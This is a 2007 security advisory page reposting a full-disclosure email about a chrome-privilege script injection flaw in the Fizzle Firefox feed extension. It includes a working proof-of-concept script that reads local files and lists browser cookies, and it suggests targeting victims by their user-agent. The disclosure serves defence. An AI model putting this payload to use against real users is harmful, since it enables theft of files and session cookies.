SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

Fizzle : Firefox Extension Vulnerability


Arrow  SecurityAlert : 2480
Arrow  CVE : CVE-2007-1678
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : No
Arrow  Local Exploit : Yes
Arrow  Exploit Available : Yes
Arrow  Credit : CrYpTiC MauleR
Arrow  Published : 30.03.2007

Arrow  Affected Software : Fizzle : Firefox Extension



Arrow  Advisory Content :  

Fizzle allows feeds to use HTML in feed data resulting in JavaScript being
run in the chrome: window with chrome permissions. The extension will
convert HTML entities back to their ASCII equivalents thus < becomes <
and so forth. Various feeds fields are vulnerable including the title
which
allows the code to execute when Fizzle is opened and no need for the feed
to be viewed.

The author Andy Frank was notified about the issue on 01/29/2007 we
corresponded on the issue and I even offered to create a patch which I
did.
The patch did not meet his liking since the sanitation was too strict and
made some feeds who use certain tags like <p> for formatting to lose their
layout I told him it would be too difficult to sanitize the data unless
its
strict because so many attack variations could be used, and best thing to
do is not allow HTML at all in the feed. On 02/20/2007 we ended
discussions
on this and I notified addons.mozilla.org about the problem and the
developers lack of concern in fixing the extension or at least disabling
its download so people would not download the extension. Well Mozilla
didn't bother to remove it and have chosen to remove the extension in a
future date when addons.mozilla.org is updated. Since then over 2,000+
users have additionally downloaded the extension, invoking me to go
full-disclosure about it.
Fizzle 0.5 (previous versions likely vulnerable as well)
https://addons.mozilla.org/firefox/1307/

Below is the example I have tested out using version 0.5 and under nightly
Firefox. Please note that the HTML entities must be present for the
exploit
to work. Place the below in your feed body and subscribe to the feed. View
the feed in Fizzle. When testing make sure you clear the Fizzle cache in
the fizzle folder under the Firefox profile.

An attacker can check if a feed subscriber has Fizzle because Fizzle's
HTTP
request sends a custom user-agent which has the word 'Fizzle' in it.
Detecting that keyword an attacker can serve a malicious copy of the feed
instead.

- ------------------------------------------------------------------------
-
POC: Local File Reading and Cookie Reading (The HTML entities MUST be
used)
- ------------------------------------------------------------------------
-
<script>

function read(readfile)
{
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(readfile);
var is =
Components.classes["@mozilla.org/network/file-input-stream;1"]

.createInstance(Components.interfaces.nsIFileInputStream);
is.init(file, 0x01, 00004, null);
var sis =
Components.classes["@mozilla.org/scriptableinputstream;1"]

.createInstance(Components.interfaces.nsIScriptableInputStream);
sis.init(is);
var output = sis.read(sis.available());
alert(output);
}
read("C:test.txt");

function getCookies()
{
var cookieManager =
Components.classes["@mozilla.org/cookiemanager;1"]
.getService(Components.interfaces.nsICookieManager);
var str = '';
var iter = cookieManager.enumerator;
while (iter.hasMoreElements())
{
var cookie = iter.getNext();
if (cookie instanceof Components.interfaces.nsICookie)
{
str += "Host: " + cookie.host
+ "nName: " + cookie.name
+ "nValue: " + cookie.value
+ "nn";
}
}
alert(str);
}
getCookies()

</script>
- ------------------------------------------------------------------------
-

I apologize for the blank emails before. Outblaze the provider for my
other
email was for some reason sending the email as blank. So using this
account
instead

Regards,
CM.

________________________________________________________________________
____________
It's here! Your new message!
Get new email alerts with the free Yahoo! Toolbar.
http://tools.search.yahoo.com/toolbar/features/mail/




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...
Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration
PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass
Copyright © SecurityReason.com. All Rights Reserved.